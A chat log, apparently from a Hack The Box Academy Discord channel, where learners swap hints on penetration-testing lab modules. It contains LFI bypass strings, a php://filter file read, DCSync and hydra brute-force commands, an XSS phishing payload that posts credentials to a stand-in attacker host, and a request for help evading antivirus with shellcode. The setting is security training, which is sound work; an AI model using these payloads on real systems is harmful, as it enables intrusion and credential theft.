#modules
ive never had that error outside of not having a sub i think so thats odd.
could try logging out and back in
see if it clears it
did that, but I'll try again
yeah works now, second relogin attempt
thanks
¯\_(ツ)_/¯
i also got no idea what you mean in the first half but your command is right but i would recommend you use the windows/x64/shell/reverse_tcp for payload
will try
Hi all,
I'm in the Password Attacks module, Pass the Ticket (PtT) from Linux section, trying to get the credentials for the user svc_workstations and use them to authenticate via SSH.|| In the crontab I found the svc_workstations.kt file and managed to extract an AES-256 hash from it. I tried CrackStation.net but they do not support AES hashes. Then I tried various hashcat modes (17010, 19700, 19900, 1400, 26403 among others) but it doesn't even let me run it most of the time, usually stating the error "Separator unmatched, No hashes loaded". Letting hashcat auto-detect the hash doesn't help either. After miserably failing all attempts at cracking the hash I tried another approach instead.
I impersonated the svc_workstations user with the obtained .kt file and gained access to \\DC01\svc_workstations where I found the flag.txt file. But when opening the file the first two characters are malformed (��Keytab_Scr1pt$-F1l3s) so HTB won't accept it.|| Please give me a hint on how to proceed 🙏
pm me
hii so I am having a problem with apache 2 which is in Linux fundamentals module
I installed apache 2 but when I browse http://localhost it just says error refused to connect so I figured to do "sudo service apache2 start" which didn't do shit XD
this is not the place for that use ++verify at #bot-commands and ask that at #boxes
i was in using the academy vpn a bit ago and it's working fine right now i'm doing offshore and that vpn also are working fine
if you are doing this on the pwnbox then you have to change the apache default port because port 80 is in used
idk lol how to change the port
hint go to where you found that file and run ||ls||
the config file is at /etc/apache2/ports.conf
find the port 80 and change it to something else
but this is only necessary if you are on the pwnbox, simple thing like this you can just do on your vm
as long as you don't as dumb shit like how to hack you are good
lmfao
so after you run sudo service apache2 start you can run sudo service apache2 status to check apache2 status and if it is running then you can just visit it on your browser
also you can read the config file (at /etc/apache2/ports.conf) to see what the port is, most likely it will be the default port (80) but if you can confirm that apache2 is running nothing on port 80 then you should check the port
it's http, but if it can't connect it will auto change the url to https
yeah it does that
so is the default port still 80?
it tells me there is no such directory when i do cd /etc/apache2/ports.conf
oh
there is a Linux Fundamentals module on the academe so if you are new to linux give that module a go
i think that module also show you some stuff about apache
why tf would you use firefox in your vm for the academy?? if your kali don't have much ram or resource then just use the browser on your host
its because the target doesnt spawn on my host browser
also you can use sudo netstat -ltp to get a list of running process and if apache2 is running on the port 80 you will get [::]:http
why are you searching for passwd.php?
if you have adblock one that could be the issue
oh am usin brave
okay thanks XXD
how to know, it is written in the question
read the question and then think
yes, it is written in the question the last word
i changed it to 8080 and still doesnt work
so nothing on localhost:8080 ??
Oh my! Thank you 😀
try curl localhost:8080
just printed a lot of lines of html and css
yeah that is apache2
no idea why you can't access it from your browser but apache2 is clearly running
You are doin https instead of http in your browser
@wheat adder try to change it with brup
if you clear the browser search bar and type the IP address it should work
https://www.hackthebox.com/achievement/machine/898742/500
Just pwned the photobomb
Any help would be appreciated, I'm on the last question of the Using Web Proxies Skills Assessment and I feel like I don't understand the wording of the question... basically capture traffic request from metasploit through proxy (burp or zap) and "find the directory being called in '/XXXXX/administrator/'..?'" the hint says to use any website as RHOST, so I'm not using the provided target system for this ?
Hello guys i have a problem with final exam in LFI
https://academy.hackthebox.com/module/23/section/513
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
I tried everything... and nothing works.
This is what i found about the target
http://134.122.103.40:31516/index.php?page=value
Server: nginx/1.18.0
Powered-By: PHP/7.3.22
Vary: Accept-Encoding
I tried PHP Wrappers but it returns blank /etc/php/X.Y/fpm/php.ini
curl "http://<SERVER_IP>:<PORT>/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/apache2/php.ini"
Returns blank
i passed this but i got stuck on the exam myself
for what you are doing in that module that is correct. no matter what rhost you set metasploit is going to try to call a specific directory for the specific exploit you are using. they are asking you to intercept that request that metasploit is doing via burp or zap and find what the directory is
@devout cliff Thank you very much ! I got it to work with burp, dunno why it wasn't working with zap yesterday.
np
if it returns blank, maybe look for something else that could be useful
Log poisoning, LFI and File Uploads, RFI is out of the option
if you can't get any of those to work, look for something else that could be useful
DO you know how to call another function ?
something that would really help here is ||page source code||
leverage the knowledge you've gained from the module to find what you should be looking for
i am looking at the source code right now
what ip address
localhost
how do i view its ip address
no you just type localhost
no doesnt work
that sucks then
XD
when the browser gives me a hard time with HTTPS not changing to HTTP i just clear the search bar and type it again and it usually works
yeah i do it too
Just try http://localhost
try http, not https
lol that aint da case
Do netstat -l
for some reason it changes to https automatically..
yep
See what port it's listening on
automagically imo
Can you give me few pointers ? I am stuck at reading the source code but i cannot find anything unusual
8080
Http protocol defaults to 80, it automatically switches to 443 if it doesn't detect a service running on 80
some backend code might not be visible because it's on the backend.. maybe if you can get your hands on the actual file, you'll find something
Can anyone give me a hint for the broken auth skills assessment? dm to avoid spoilers?
gobuster time
Oh yeah that reminds me I went to sleep earlier when I threw John at the hard skill .vhd file
well, did you get a hit?
Idk lol I was tired af and was like "I could use sleep"
i did the same thing with the hashcat skills assessment
except that was a complete waste of time
I'm stuck with the ||support user|| and ||trying any password matching the password policy from rockyou.txt|| does not lead anywhere
thanks for the tips i go to bed now but ill continue tomorrow
php.ini is a file on a backend and probably system() function is disabled
@dim wolf ggez
excellent
Are there any modules/sections on getting persistence?
Cuz like nothing in CPTS covers it at all and I feel like that is really important
Theoretically you could hide a shell file and create a benign system service to call to
Its not that important for the level CPTS aims at
or at least, the very obvious ways to persist that you should be able to run two braincells together to figure out is more than adequate for the non-evasive testing that CPTS teaches
i really cant figure this out, i dont know what am i doing wrong
is it tomorrow already??
i cant sleep, it bothers me..
how can you grab the full source code of a page?
you won't be able to get the full source code if you simply right click and open page source
that will not tell you everything
curl "ip:port"
that will not tell you what goes on on the backend
than burp ?
that will not do either
if you can find some way to get the full source code of the webpages
maybe you can just read the source code from the server itself??
Like... you can somehow manipulate something
For example, a request you send to the server
I think that if you can manipulate it somehow, it will give you what you're looking for
I keep getting an error on the DCSync assessment in the AD module: Someone else who has this problem too and knows how to solve this? python3 secretsdump.py -just-dc INLANEFREIGHT/adunn@10.129.21.35 -outputfile hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[-] NTDSHashes.init() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...
was that subtle enough?
enough for a start
i need to research more into this
what share are you trying to connect to?
Take a look closely at the question; it's not asking you to connect to the share :) it's just asking you what the Full FilePath is
you ARE meant to RDP into the machine
ah so you're using the pwnbox
you should be able to use smbclient //IP/share-name -U htb-student
I read the PHP Wrappers
¯\_(ツ)_/¯
Try resetting the target
going through the steps again
and trying to connect again
then idk man best to just move on, plenty of modules make proper use of it ¯\_(ツ)_/¯
it doesn't matter which rdp command you're using to connect
RDP is RDP
xfreerdp /u:"username" /p:"password" /v:IP
I cant figure this out
are you trying to smbclient from within the windows host?
if so: that's why
try smbclient from the vm
ok. start from the beginning.
start the skills assessment VM. look around and search for a potential LFI. if there is one, see how you can exploit it and what information you can get from it.
can someone help me with linux priv escalation module?
if i put IP:PORT/index.php?page=/etc/passwd
It returns blank page
Hello someone can help me with CrackMapExec Skill Assessment ?
the rest is Invalid input
nice pfp bro
click on the gif before, but thanks U2 bro
i'm sorry but i can't think outside the box for you. you're gonna have to do that yourself.
what program besides curl and burp you used to view page source ?
@final trench best not to get hung up on trying to follow along too closely sometimes
damn man
lmao
i got a better one tho
😎
Ill sleep over it. Its already late and i have to get up for work tomorrow
which module are u working on?
Skills Assessment - File Inclusion
you can try many filter bypasses (....//....//....//....//etc/passwd, etc)
you should re read the sections
also IP:PORT/index.php?page=/etc/passwd wont display etc/passwd cause this path isn't present in the web root folder
always go back
^
why the double // in the backup and not single?
its the last exam, i have to think outside of the box but i cant read source code straight from the server
or is that a filter thing
there are filters which remove sus payloads from petitions
one pretty common removes ../
so ....// - ../ = ../
clever girl
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
?
that's the question he's struggling with
i mean yeah, that is literally the final assessment
it is
seems like he rushed them
doing lfi like this IP:PORT/index.php?page=/etc/passwd makes 0 sense
yeah
that just looks incorrect
I understand testing lfi by checking /etc/passwd
but generally you need to get to that root folder
thats it
page= just means that in the index (webroot) where are you navigating to?
page is a GET parameter
only if web root dir isnt specified i guess
but it's best practice to just walk it back first
otherwise / = /var/www/smthng usually
../../ always works whether /etc/passwd doesn't
ye
i am improving i got base64 decoded
Hello, I am stuck with this question Escalate privileges using the same Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.
I got a new web page
you don't have to ping me for everything..
thats odd
Hi, everyone, I have to perform subdomain enumeration against gihubapp.com for the final question in the Information Gathering Web Edition module, to find a subdomain that has the word 'triage' in the name. Already tried using sublist3r multiple times, as the hint suggests, but it didn't work. Any ideas?
how to use burp to poison the log ?
try looking up the certificates
hey man, you just need to download the exploit and run it
^
"use the exploit and do the thing"
Guys help idk what to do
sums up half of what it is here LOL can't say I haven't done the same though
spoiler that link thx
guys does anyone know to get a interactive shell form meterpreter without python?
there's some information about that in the Shells & Payloads module
I would say this image would be a spoiler
ugh my bad
I am trying to complete the Footprinting-Hard Challenge but the openssh private key keeps getting denied as Permission denied (publickey). I have set the right permission and ownership options.
are you sure you copied the id_rsa correctly?
with the --Start and ---END blocks?
Yes, of course.
I have used the 1 FETCH 1 body[1] command to fetch the key.
How can I display the whole message?
rfc822
?
Maybe tom is not the username?
just use an email client
if you are only getting a little bit of the message and you want the full message when in the mailbox i think you have to -rfc822
¯\_(ツ)_/¯
1 FETCH <id> body[text]
It was the f*cking copy-paste
I see what the difference is
also sometimes copy/paste adds an additional line that rsa doesn't like
Try another field for the payload, and try the payload from the session hijacking lesson
It screwed up by not importing the whole last line.
F
yeah, when using tmux it derped out for me i removed tmux and was fine
I didn't care enough to use tmux
Brother that message was from a month ago. you good?
No, lol 😂
i'm glad I realized I could filter the Stdout as a command is running so that I didn't just have a wall of "Logon_Failure" in CME unless there's a way to filter it out in cme that I'm too dumb to know
Are there any modules that show use of Sliver?
PIVOTING, TUNNELING AND PORT FORWARDING. Im on the last question, where i need to get the flag from the Domain Controller, i think i already have the IP of the machine but i cannot manage to have access. Im using netsh on the 2nd and the 3rd machine to get access to the Domain Controller (the 4th machine). it is possible that I am doing more than i'm supposed to hahaha i'm missing something. any help is appreciated guys
what academy modules would allow me to do a majority of the easy HTB machines asap (like within the next couple days). im assuming "Getting started" and "penetration testing process". i was doing photobomb but had to self learn burpsuite and web attack vectors because i hadnt gotten through that in Academy yet
submitting my resume somewhere by end of next week and want to get to script kiddie or the one above that before i submit so i can include that progress in my resume
being completely honest here: if you only do the easy boxes just to have this illusory prestige - then you're not actually looking to learn how to use tools
there are plenty of modules regarding the fundamentals
that are all 10 cubes and refund 10 cubes once completed
so essentially "free"
so would it be better to show what ive gotten through in the academy compared to machines?
i have student plan so i can do up to tier 2 but obv ill start with the basics. just wondering if the "getting started" and "penetration testing process" should be the ones i do first
it depends on the job tbh
its for work placement so technically i dont know the job. just trying to stand out compared to other classmates
this is a discussion that is heading towards #careers-and-certs
yeah fair. i guess ill just do what i can within the next week
delete the picture and yes you're very close just the orientation may be off
how are linux files shown compared to windows?
cough look at your own linux terminal
pwd
mhm
:)
YEP
lol
that's why i was like "you're THIS close"
stuck here, "Firewall and IDS/IPS Evasion - Hard Lab". Please hint 😉 Thinking large data = UDP, tried fast UDP with no DNS resolution and service detection with decoy random:5. Already exhausted TCP stealth techniques (fragment, MTU, min-max ttl, etc.)
@slender shoal mind is focusing on the administrator going to training for "one week" and having to change protocols
@slender shoal right direction?
copy... I'll look back in the module (crosses fingers)
Follow the last two examples in the module, don’t over think it.
hi everyone
@slender shoal @plain coral Thanks for the tips... main thing I learned... patience is a virtue. Just wasn't waiting for it.
o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*****... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?
mod= File Transfers -section Windows File Transfer Methods -2nd question. cant connect RDP- tried xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.201.55 also tried using remmina and just errors out with freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
any ideas?
does anyone know what we're supposed to be doing on the nessus assessment. it says to log in to the machine which i have but it doesnt seem to have the nessus service on it
Edit: Nevermind i figured it out
questions for Active Directory Enumeration & Attacks
- for DCSync Q3, am i suppose to use the windows RDP to get the answer? (i got the answer by using chisel and following the previous steps)
- For Privileged Access Q3, same question as above, i basically just use chisel to connect them together @.@
- for AD Enumeration & Attacks - Skills Assessment Part I,
do i have to do everything in that webshell or can i just get a new shell from it?
Skills Assessment - Using Web Proxies - The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. Looking for a nudge on this. The cookie I see is already in cleartext cookie: X*******. Have tried multiple decoding variations, but can't see anything. Thanks!
I am not able to connect to windows 10 VM using RDP. I get errors each time try to connect. I am on windows fundamentals.
Nvm, I solved it by just changing the VPN file and restarting the VPN several times and now it works.
I'm going through the network enumeration with nmap module and although I've gotten the flags for the boxes, I can't seem to get ip spoofing to work. In the examples it works fine when spoofing your IP with Nmap from the same subnet as the host you're scanning, but when I do it
-S 10.10.10.10 -e tun0
Nmap says it can't find the route.
I read off of Google that you have to be in a place to capture those returning packets (like attached to the network you're scanning), but in the context of this module/lesson, im a bit confused
It automatically disconnects from windows 10 VM, any solution for this?
only after connecting of 4-5 seconds.
ERROR -
```
xfreerdp /v:10.129.36.104 /u:htb-student /p:Academy_WinFun!
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - freerdp_post_connect failed
```
this is one you might not be able to just follow along with iirc
give it coffee
oofda
Has anyone had antivirus block websites while doing ffuf?
blocking for malware?
Is HTB trying to hack me?
@tidal kelp you are on the right path, ||check the log file "Responder-Session.log" under /usr/share/responder/logs||
can I use openvpn connect and vnc on my Android tablet for htb?
Just curious but how long is the longest you guys and girls have spent on a box because you refused to see the hint?
Good morning guys
~3-4 hours
You doing penetration tester path?
ye
one of the boxes for the module section i'm on i had to reset several times for the service to pop up
sorry sir, can i dm you about this section?
Is it impossible to attack a Apple device?
So, why is it never mentioned in most HTB?
@tidal kelp sure
I think as hackers, we should also know about Mac & iOS attack methods
i see in Active Directory Enumeration & Attacks, "sudo crackmapexec".
is it important to use sudo with crackmapexec?
for the most part most enterprise networks run Windows/*Nix devices
i dunno but i never use sudo with CME
you learn how to attack apple devices; i'm just stating the common reason why
That's fine tho. I bet they must have even thicker levels of security
yes same i tried without sudo as the crackmapexec website docs and it works fine. just was confused from the cheatsheet. but thanks all good 👍
so technically most things that would run (i.e. linpeas) would work
LOL trying to hack a artist?
Explain linpeas
it's an exploit checker that checks common exploits and tests to see if the user can perform them in terms of privesc
Whats yall opinion on the hardest module?
Documentation and Reporting if you actually do it right
if you just want it checked off, its super easy to blitz through it
but if you're doing it right and its your first time actually dealing with making reports and formatting findings while mixing it into your methodology? its brutal
Module: INFORMATION GATHERING - WEB EDITION
Section: Page 7/ Active Subdomain Enumeration
**Problem:** I dont know what should i do with ip in Q:4,5
Can someone help me?
Anyone has a nudge for me on Broken Authentication skills assessment? With the wordlist shown in the modules I find my own test user and one other + the user I got from reading the website
Tried bruteforcing the password of the account found on the website using a filtered rockyou based on the password policy but didn't seem to get a hit
I know how the cookie works but I get an error page if I tamper it to another user
This is where everyone thrives who has done something like a thesis
It's kind of the same structure
Hey guys,
I'm doing Web attacks skills assessment but the reset token doesn't change when i request it so I get invalid token
any one did LPE module , i have a question Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. i need a hint
Broken Authentication
when i did it i wanted to throw my pc out a window so many times
i had to ask for so much help because it felt like the module used things and asked for additional weird knowledge outside from what they taught you
but its been several months since i took it, so i dont remember all the details of it
im about to start the attacking common apps skills assessments, do i need to lock my windows?
i havent done it yet
i got so frustrated with broken authentication ive parked it for now
hate wild goose chases wondering if you have the right wordlist or not lol
Do you have a nudge for me on this one? Or on the brute force skill assesment the second step?
or you? I also don't like the wild goose chases and I only need to finish these two labs to be able to do the exam
i dont have the time right now unfortunately to go into it i apologize
Okay, no worries
i would have to redo the assessment
i dont have my notes on it anymore, they went poof
sorry mate no, try searching the hackthebox forum
i found a lot of nudges in there also
yeah, did the same thing. I think I should have the right thing now for brute forcing but somehow it is not working ...
so would be handy if I could verify with someone
You almost there; just ensure every line in the numbers.txt file is prefixed with htbadmin e.g "htbadmin1676025163010". A tool like 'sed' can be handy
mmh anyone had the same problem where the attempts don't seem to go down?
maybe turn down the thread count?
im not sure
try default thread count and see what it does
no difference hmmm
i wish i had more time to look into it but just looking at it i dont see the issue. have you already tried resetting the box? other than that i would just double check any syntax in the command. it seems that hydra isnt hanging but maybe getting an error from the box? i would maybe proxy the output to burpsuite/zap and see how everything looks from both sides and then troubleshoot from there
Dayum
yeah i would need to look at it later today to remember what issues i had with the module as a whole. i can imagine it might give me some ptsd-like symptoms though once i recall what happened
i just remember it was not a good time with that module. i think it took me maybe like a week or so to finish?
mmh yeah I'm really confused because box seems to work still
a forum post mentioned that you can do it with rockyou-10 but testing with burp as well now and it seems that it is not in rockyou-10
Anyone have a help for Login Brute Forcing - Skills Assessment Website (question 2, the login form)? The hint says to use the username you found earlier--the user name found in the question before was ||user||. I noticed the parameters were different so I changed them and the fail string. I'm trying: ||hydra -l user -P rockyou-10.txt -f 134.122.103.40 -s 31941 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"|| (rockyou-10.txt is in the directory)
You forgot the basic auth header
You have to add that one to be able to reach the website
However, I’m struggling too bc even with that it didn’t work for me yet
I'll add that.
Let me know if it works for you :). I like to move on with this assessment too
I'm on the XSS phishing module in the academy. it says port 80 is already in use so i cant use netcat to listen on port 80. how do i fix this
the process running on port 80 presumably is the HTB browser cause if i kill the pid the entire box goes blank
the instructions say to do nc -lvnp 80 but it just wont work
how about running on another port that is not being used?
if i try using like 8080 i get nothing back from the /send.php page
Don’t forget to adjust your payload and at the port in the payloadurl
but you are providing almost no info. Why do you want to listen for? Why port 80?
GENIUS. only problem now is when i send it on send.php its saying its an invalid url but it worked on the other page, hmm let me try something
think its cause im having issues removing a form hmmm
Any luck @tribal plume?
can somebody pls explain me why tf its not connecting to mysql db?
i dont understand if the server has some connectivity problems or not, been trying to refresh the target several times, im wasting time just to try to connect to a db wtf hahah
Afraid not. I'm going back and rereading the module on the form logins.
can someone tell me which part of this script is fcking up (sending ss one sec
I'll try the bigger wordlist maybe. I used rockyou 10 because it was on the server previously.
oh fck its getting URL encoded
```js
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
```
thats the base of the script, but it isnt removing the image box at the top
solved it, fuck i had to use ||mssqlclient.py|| ffs
The problem I’m having is that hydra doesn’t seem to really perform the attempts
Oh, it seems to have done them for me.
like i think i need the form removed but code aint working, ive confirmed the form is called urlform
okay if I DM?
Sure.
Hi, I need help for the live engagement - Shells and payloads on the second question. I upload the .war file and it was successful and I have the shell, but I cannot reach the folder C:\Shares, I don't know why, I try different commands (dir,ls,tree,cat) but still don't work. Maybe it's something simple but I'm lost 😦
ok simpler example cause this is the main issue
when i just try using this document.getElementById('urlform').remove();
it does not remove the form even if thats the only part of the script
urlform is 100% the name of the form
any help or advice for this Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john ? i cannot solve it
module: password attacks
sec:pass the ticket
wait what it connected back to my machine even if i specified the target ip, wth?
im confused
p
any tip pls?
Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. ||I've managed to get access with user mike via SSH and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore i tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness. I also tried downloading LaZagne via smbserver.py but was unable to because smbclient is not installed on the target. I also tried downloading it via python3 -m http.server 8000 but was unable to unzip the file I had saved Lazagne in. I have also confirmed that it is not connected to an AD with the realm list command.||
Can i get a hint please? 🙏
It's MSSQL DB, mysql command wont work and sqsh is broken on attack box, try mssqlclient.py
is it normal that it spawns back to my vm?
wdym?
i logged in via mssqlclient.py but i just see my vm contents
never used this tool, i'm a bit confused haha
holy crap the common apps skills assessment 1 was tricky
Thats the 1st thing i did but its not accepting any kind of mysql command like ' show databases; ' does it require a different syntax?
Yes, MSSQL has slightly different syntax than mysql/mariadb
Should be covered in the section, the basic MSSQL commands like showing databases,tables,columns , etc..
k thanks, it's a bit confusing at first haha
Hey people, I have a weird issue with ffuf. I'm working through the module "Attacking Web Applications with ffuf". Throughout the whole course I had this issue that ffuf would get really slow mid-scan, the req/sec would drop really low, the error counter would stack up, and my whole internet connection would not work. I couldn't load sites in the browser. Eventually the scan picks up again, goes to a normal req/sec rate, and my browser becomes responsive again. This is really hindering the completion of the final skill assessment and general use of ffuf. Any ideas what's going on there?
Error: error on running gobuster: unable to connect to http://64.227.35.4/: Get "http://64.227.35.4/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
help
try uname -a
how scared should i be about starting AD enum and attacks? 😛
It says it updated 2023-01-12 so maybe they havent updated the reply box?
if i am struggling on a module, is there a way i can just skip to the next one
like im in the bug bounty xss module and just struggling and would like to continue the bug bounty thing but just go to the next one
But I want to complete it and I want my cubes. Im not struggling to find the info, im struggling to make the proper info work
sure but i believe to sit the exam you must complete all modules in the path
ye how do I skip to the next one, I'll come back later
anyone
ah I figured it out I think
I'm so stupid that I can't do the first task haha
there was actually either issue or it could be tricky question as well
And you're using the pwnbox to answer this question?
LOL actually I tried the new integrated terminal and got confused, it's all good now 😅
Hello @lethal atlas, were you able to resolve msf "exploit aborted due to failure: unexpected-reply" while running wp_admin_shell_upload? Being the user with admin creds, clearly the enumerated user has permission to upload files. There is no FW or AV. Not sure why it is not working? Any idea what worked for you?
really ?
It's all relative; I found the PW attacks pretty trivial tbh
I am not near my pc right now but I can help you in a couple of hours if you still need
Except fucking kira
Eh even knowing about kira it really wasn't all that bad for me
I hit the kira wall but wasn't stuck for too long
Can someone help me? I have a shellcode, I use the loader to load, but can not bypass the anti-virus software interception, may I ask what I should do? Is there anyone who can help me or provide some tools?
What module is this related to?
Someone else working on broken authentication final assessment? Could use a small nudge (only lab left 🙂 )
is this a module?
I'm sorry
If not, can we please keep this channel module related.
any hints
DM
does anyone else have this error when trying to open the embedded burp browser?
this is under shells and payloads php shells
Looks like burp doesn't have a default browser to use maybe?
it does tho
been stuck for 1hr trying to get burp to work lmao
i even reinstalled the latest version
Check settings, see if it's using Firefox
Hmm not sure, I haven't had any issues myself with burp
Yes please @lethal atlas. I mean I can try to get shell access via other routes, like tinkering with themes, but I'm just not sure why the msf exploit doesn't work. So were you able to fix that issue or did you try some other workarounds to solve the problem?
hello, can someone help me, I don't understand why I can't ping or do an nmap scan in the modules
This is a docker container, so you're not going to be able to scan it
This section is about using the web techniques discussed to enumerate the system
I wanted to try to recover the version of WordPress but thank you
Yea, I looked at that too...
will try again
Yep
Does anyone know if it is normal for the skills assessment of broken auth that you end up with 4 passwords from rockyou that are in line with the policy?
If you look carefully you'll find it; look for root in that history
Found it, thank you. What a ride I went on there 😅
mike is bad at opsec
just a note: the med/hard labs are where you'll use the mutated custom list so be prepared
just so you're prepared :)
I went for the mutated list straight away in the easy lab too. It took me 4 hours to find the right one. I guess I tend to over complicate things haha
^ I did the exact same. Easy lab took me 3 days easy. Medium in my lunch break. Hard, maybe tonight 🙂
from what i've heard with many of the password attacks related things: it'll either be the pre-given list or rockyou.txt
Really need to work out the approach before blindly starting, hehe. Also this module be like hey remember that password from 7 sections ago, use it here. Ugh, of course I didn't save that...
yeah
I honestly loved pw attacks because it was a test of how good of a note taker I was
alongside the general knowledge
Agree, I learned from it 🙂
because I was able to jump from "ok I got this, what's the 2john I need to use for this?"
it's pretty fun though :)
This I remember. I believe you will have a low number of passwords that match the policy. I don't remember the exact number but it won't be just 1 password. And you need to be very careful with looking at the policy and get it exactly right as intended or I think you can get locked out for x amount of time.
Yeah, I now have 4 and the lockout starts after 5 attempts but it seems not to be working :p
Pm me the password list you have narrowed it down to based on the policy
Ehm..??? my post disappeared?
Might've had a spoiler idk
pm'ed 🙂
It didn't... Will try again... crackmapexec thinks it found the password even though it didn't. Anyone know why? How do i make it run?
||
┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations]
└─$ crackmapexec smb 10.129.89.36 -u john -p password.list
SMB 10.129.89.36 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False)
SMB 10.129.89.36 445 SKILLS-MEDIUM [+] \john:123456
||
||
┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations]
└─$ smbclient \\\\10.129.89.36\\JOHN -U john
Password for [WORKGROUP\john]:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
||
use the verbose flag to check the details
||
┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations]
└─$ crackmapexec smb 10.129.89.36 -u john -p password.list --verbose
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,ftp,winrm,ssh,smb,rdp,mssql} ...
crackmapexec: error: unrecognized arguments: --verbose
||
???
--continue-on-success iirc
You will need to put the argument at the beginning before the protocol. CME can be weird on where arguments are placed
I'm on the shells and payloads assessment, may I know what is the default web browser for parrot os?
so it's basically cme {arguments} {service} {service-arguments}
firefox & in terminal
ok thanks
looks like you're rdp into something. so that may be why
that's why you're not getting an answer
the other easy way is to just create a .html; navigate to the file; and attempt to open
¯\_(ツ)_/¯
question
how am i actually supposed to do htb academy if it costs cubes
to get cubes you pay
i don't have money to pay, i have 40 cubes and the first module is 50 cubes?
wrong channel, maybe but I don't know where else to ask
@fathom pendant: --continue-on-success iirc does not work - syntax error.
@storm jackal:
||
DEBUG Started thread poller
DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")
DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")
DEBUG:root:Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused
DEBUG Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused
SMB 10.129.171.227 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False)
DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")
DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")
DEBUG:root:add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2
DEBUG add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2
SMB 10.129.171.227 445 SKILLS-MEDIUM [+] \admin:123456
DEBUG:root:Stopped thread poller
DEBUG Stopped thread poller
||
It runs just fine against the target in the Network Services section
Adding the --verbose flag has helped you though! Looks like you're running into a security error with SMBv1
The Academy is not free and costs money.
With the 50 cubes you receive at the beginning, you can complete the Tier 0 modules. All other modules cost money
oh that's a shame
thanks for helping
Have you completed the Password Attacks module? did you have the same problem?
Yeah I completed it. Looking back on my notes...i think you're going down the wrong path if you're on medium. Feel free to DM me
Ugh, someone please help? I have been stuck on the Introduction to Linux module for 3 days now and can't figure out either how to properly install OpenSSH or how to properly connect, etc. I have done YouTube tutorials and tried many alternatives. If anyone is willing and or wanting to help a noob out, feel free to hit me up please. "Service and Process Management" P.S. I know I can provide much more details for better potential help, though it's just a lot what I tried, so to not spam in 1 message I will await
Openssh should be preinstalled
anyone is free
hey I'm working through "attacking web application with ffuf" and for the life of me can't find the page with "You don't have access!". The combination of subdomains, extensions, and directory list is taking far too long to scan, even without recursion. I've also manually scanned the two subdirectories and found seemingly nothing underneath them.
EDIT: solved by following hint more carefully and/or using a (further) reduced wordlist
halp
Assuming that we are both correct and that htb academy was just throwing everyone a curveball by saying if it's not installed, then what? I tried connecting but I keep getting an error message, if you have some time I can go into more information?
Hey all - I'm on the responder module. When I launch my responder I'm getting a different IP then the one given by openVPN. Is that correct? If so I'm not receiving any events when trying complete the challenge capture. Any tips on how to get Responder working?
+HelpPlease *Linux Fundamentals *Service and Process Management
systemctl start ssh _______> "AUTHENTICATING FOR org.freedesktop.systemd1.manage-units +++ " ____> Authentication is required to start 'ssh.service'.
Authenticating as: ,,, (htb-ac714580)
Password:
